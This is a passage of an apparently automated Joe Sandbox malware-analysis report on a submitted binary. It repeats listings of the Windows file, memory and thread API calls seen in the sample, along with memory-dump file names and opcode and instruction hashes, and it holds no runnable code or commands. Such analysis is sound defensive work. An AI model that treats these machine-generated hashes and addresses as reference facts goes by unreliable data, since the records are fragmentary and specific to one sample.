                                                                                  • Part of subcall function 0040976C: lstrlenW.KERNEL32(?), ref: 004097F7
                                                                                  • Part of subcall function 0040976C: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040980C
                                                                                  • Part of subcall function 0040976C: lstrcpyW.KERNEL32(00000000,?), ref: 00409822
                                                                                  • Part of subcall function 0040976C: lstrcpyW.KERNEL32(-00000002,?), ref: 00409834
                                                                                  • Part of subcall function 0040976C: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040983E
                                                                                  • Part of subcall function 0040976C: LocalFree.KERNEL32(?), ref: 00409847
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$??2@FormatMessagelstrcpylstrlen$ErrorFreeLastLocalwvsprintf
                                                                                • String ID:
                                                                                • API String ID: 3247304187-0
                                                                                • Opcode ID: c811e019901b6a811436f6386d28b0397ed2eab7dc28481a84a831be7bbca114
                                                                                • Instruction ID: c8cfcf64f4d727165aa460a5e60b04b55843b987d0c6720e9ddf697575640f7a
                                                                                • Opcode Fuzzy Hash: c811e019901b6a811436f6386d28b0397ed2eab7dc28481a84a831be7bbca114
                                                                                • Instruction Fuzzy Hash: CD019271504619AEEF10AA6598C1AFF7368EB0034CF10447FF612372C2DA795D898E5A
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: H_prolog
                                                                                • String ID:
                                                                                • API String ID: 3519838083-0
                                                                                • Opcode ID: afbb77ebcebef81e2cf385e1134c7783f6bd7d92ebd3f59a0857a247aa1f2ec6
                                                                                • Instruction ID: 41c31309152594a5cdc9a94e22e8fdd470941a79d1f82a5d583071a5725c450b
                                                                                • Opcode Fuzzy Hash: afbb77ebcebef81e2cf385e1134c7783f6bd7d92ebd3f59a0857a247aa1f2ec6
                                                                                • Instruction Fuzzy Hash: 77F0FF32400248FFDB21CF88C845BDEBBB1EF40324F04865EF80562250C3BDAA90CBA9
                                                                                APIs
                                                                                • SetFileAttributesW.KERNELBASE(?,?), ref: 00402728
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: e30c021431c8dc767e28d2db58534a27e2d4e67a42e3bcdc1a5b57926e33b774
                                                                                • Instruction ID: bda90a93fc5a79562ae67f98b1e8df01e77ba5ebef7748c498c118ca2824b36e
                                                                                • Opcode Fuzzy Hash: e30c021431c8dc767e28d2db58534a27e2d4e67a42e3bcdc1a5b57926e33b774
                                                                                • Instruction Fuzzy Hash: C4F01731100601DBDB61DF69C988B97B7F4BF48345F04492EE48AE76E0D7B9E885CB19
                                                                                APIs
                                                                                • WriteFile.KERNELBASE(00000008,00000000,?,00000000,00000000,00000008,?,004112EE,00000000,?,00000000,00000000,00000000,?,004124B8,?), ref: 004112B5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID:
                                                                                • API String ID: 3934441357-0
                                                                                • Opcode ID: 3823a46a90e705b780842d9b9d1914895d37d3d957bde1875c21ce7738ae9c40
                                                                                • Instruction ID: 0023b8de25620b55143802bd0f89cc8c2b593093c471a7488b0b9917581c8630
                                                                                • Opcode Fuzzy Hash: 3823a46a90e705b780842d9b9d1914895d37d3d957bde1875c21ce7738ae9c40
                                                                                • Instruction Fuzzy Hash: F0E0E575A41209FFDB00CF95D801BDE7BF9EB48354F50C069F9189A260D379AA50DF54
                                                                                APIs
                                                                                  • Part of subcall function 0041115B: CloseHandle.KERNELBASE(0041E7B8,00000014,00411364,00000000,?,004113AA,0041E7B8,80000000,00000000,00000000,00000000,004113CD,00000000,0041E7B8,00000003,00000080), ref: 00411166
                                                                                • CreateFileW.KERNELBASE(0041E7B8,00409A47,00000000,00000000,0041E7B8,004113DB,00000000,00000000,?,004113AA,0041E7B8,80000000,00000000,00000000,00000000,004113CD), ref: 0041137B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateFileHandle
                                                                                • String ID:
                                                                                • API String ID: 3498533004-0
                                                                                • Opcode ID: 80b8b5df33a30570d28e0a343dc471cf771b25124c2d66bbf4d53c6fd93a2205
                                                                                • Instruction ID: 7f7215a53688679663676b47c899f3015bbad9dd6bad72367c24d06892668cc0
                                                                                • Opcode Fuzzy Hash: 80b8b5df33a30570d28e0a343dc471cf771b25124c2d66bbf4d53c6fd93a2205
                                                                                • Instruction Fuzzy Hash: 70E08632000219BBCF111FA49C02BCA3F66AF09360F104626FB11561F1C776C4B0AB94
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: H_prolog
                                                                                • String ID:
                                                                                • API String ID: 3519838083-0
                                                                                • Opcode ID: 6dcfb0b3f8ff67c5fe89e3e4baa8ae41fa6805a61c95a6512c09056436acd5ff
                                                                                • Instruction ID: 85b5f634bb3876c881f9a369785aad2c034a51649cb27cc2246a7d4990ba049a
                                                                                • Opcode Fuzzy Hash: 6dcfb0b3f8ff67c5fe89e3e4baa8ae41fa6805a61c95a6512c09056436acd5ff
                                                                                • Instruction Fuzzy Hash: 7BE08671900214ABD7149B8AC8077DEBB78EB40765F10425FF01162280D7782E008568
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: _beginthreadex
                                                                                • String ID:
                                                                                • API String ID: 3014514943-0
                                                                                • Opcode ID: 0249f964b4c06bf6ddaf9ed2643bfe3927903dc7b70e5f300a9eb7fd59aeab1f
                                                                                • Instruction ID: 2aa1260f39b219495775a5a96dce83a8c9144485e5dc473d2f94c266e6d0d9a7
                                                                                • Opcode Fuzzy Hash: 0249f964b4c06bf6ddaf9ed2643bfe3927903dc7b70e5f300a9eb7fd59aeab1f
                                                                                • Instruction Fuzzy Hash: 73D05EB29002087FDB00AFA4DC05CBB7A9CDA45260700843ABD48CB301E5729E6087E5
                                                                                APIs
                                                                                • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 00411238
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                • Opcode ID: 39bbe8b1e9019e7b2d5fad33dac547c7575ae00130540e2fd0b68d00fb51dad4
                                                                                • Instruction ID: 592777a0cbf9ed61c554e453f95aac0b5ff3b8d945bf09df7fedf92081e1879d
                                                                                • Opcode Fuzzy Hash: 39bbe8b1e9019e7b2d5fad33dac547c7575ae00130540e2fd0b68d00fb51dad4
                                                                                • Instruction Fuzzy Hash: 14E0EC75201208FFDB01CF90CD01FDE7BBEEB49758F208058E90496160C7769A20EB55
                                                                                APIs
                                                                                • SetFileTime.KERNELBASE(?,?,?,?,0041128F,00000000,00000000,?,0040270B,?), ref: 00411273
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: FileTime
                                                                                • String ID:
                                                                                • API String ID: 1425588814-0
                                                                                • Opcode ID: 5e2c3f4fd95572551ce7389ed7a8d0418e4bf28c6d4fd737443a5967939eb4fb
                                                                                • Instruction ID: 14e9d413570242a207ede0755a0e187765c1d7efe63821fc46ad5d1f7ad43643
                                                                                • Opcode Fuzzy Hash: 5e2c3f4fd95572551ce7389ed7a8d0418e4bf28c6d4fd737443a5967939eb4fb
                                                                                • Instruction Fuzzy Hash: 23C04C36159105FFCF020FB0CC04C1ABFA2BB99311F10C918B159C4070C7328038EB02
                                                                                APIs
                                                                                • ??2@YAPAXI@Z.MSVCRT(0000000C,?,00000000,004067DF,?,00000000), ref: 00401354
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@
                                                                                • String ID:
                                                                                • API String ID: 1033339047-0
                                                                                • Opcode ID: 6de0e411032e451e504fc76718b12b47332f52b8bf215be46ff0267bd0230b75
                                                                                • Instruction ID: 9b740768f600bbd434f173913778787e3c0435d902e00cab9e4412b019abca16
                                                                                • Opcode Fuzzy Hash: 6de0e411032e451e504fc76718b12b47332f52b8bf215be46ff0267bd0230b75
                                                                                • Instruction Fuzzy Hash: 7FF02270104210AFD7188B65D84EC97B7E8EF85320305C4AEF81ACB3A1D778EC82C6A4
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,?), ref: 004122E0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1452528299-0
                                                                                • Opcode ID: d509e3b73838843a45d009e079e0ca887772c46ed55d806236c8cbc1e203ec92
                                                                                • Instruction ID: 6d5529d2897140aadd979f9f6666313ec97981f96f3cf44ff7ecc7f719b31ebf
                                                                                • Opcode Fuzzy Hash: d509e3b73838843a45d009e079e0ca887772c46ed55d806236c8cbc1e203ec92
                                                                                • Instruction Fuzzy Hash: 3AF06D7120020ADBCB248E64C900AFB7765FF00314F10496AED16D6660D3BDE8A6DB59
                                                                                APIs
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00411BCA,?,?,00000000,004025B9,?,?,0041E788,0040297D,00000000,?,0040508D,?), ref: 0041198F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@
                                                                                • String ID:
                                                                                • API String ID: 1033339047-0
                                                                                • Opcode ID: e62b0a091c70a990ef5259a957749949a312ccd1e08ac78a8b9f9005f8eb361d
                                                                                • Instruction ID: c6dd757af0c1ba279d4dea7c6a80b7e4f73fa27ff16b3e9179e8d8f42dc612cd
                                                                                • Opcode Fuzzy Hash: e62b0a091c70a990ef5259a957749949a312ccd1e08ac78a8b9f9005f8eb361d
                                                                                • Instruction Fuzzy Hash: ABE01D735052015FD3248F2DD507657F7E9DFD0320F14C52FD596C7290DB74A4818554
                                                                                APIs
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000018,?,0040508D,?,?,?,00000000,?,?,?,?,?,?,?,?,004055D0), ref: 00402968
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@
                                                                                • String ID:
                                                                                • API String ID: 1033339047-0
                                                                                • Opcode ID: bb81aa1edb6922299d1acbfae398dae3b7c7bca9dc960b94ece09830f4446531
                                                                                • Instruction ID: 3c4924e632bf8de9284e3dfcfd8e31cb7db5e3eb6efac072798042e24d92b66a
                                                                                • Opcode Fuzzy Hash: bb81aa1edb6922299d1acbfae398dae3b7c7bca9dc960b94ece09830f4446531
                                                                                • Instruction Fuzzy Hash: 26D0A96270421232DA542136192A9AF04850BA1324B04083FBC09BA2D0DDBCCC82929D
                                                                                APIs
                                                                                • CloseHandle.KERNELBASE(0041E7B8,00000014,00411364,00000000,?,004113AA,0041E7B8,80000000,00000000,00000000,00000000,004113CD,00000000,0041E7B8,00000003,00000080), ref: 00411166
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandle
                                                                                • String ID:
                                                                                • API String ID: 2962429428-0
                                                                                • Opcode ID: 07fcbf98cd6418257f68abd7a88b9ae89250d8f7ef7824f403ab4521d4148bf0
                                                                                • Instruction ID: 054d9df42e2342d198a541279ff18f785dd1647d9572a3c5038800ec3afc9341
                                                                                • Opcode Fuzzy Hash: 07fcbf98cd6418257f68abd7a88b9ae89250d8f7ef7824f403ab4521d4148bf0
                                                                                • Instruction Fuzzy Hash: 0FD01231144521668A641F3C78485D273D86E07330731175AF1B0C33F0D3648CC34654
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,004126A3), ref: 00418EA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
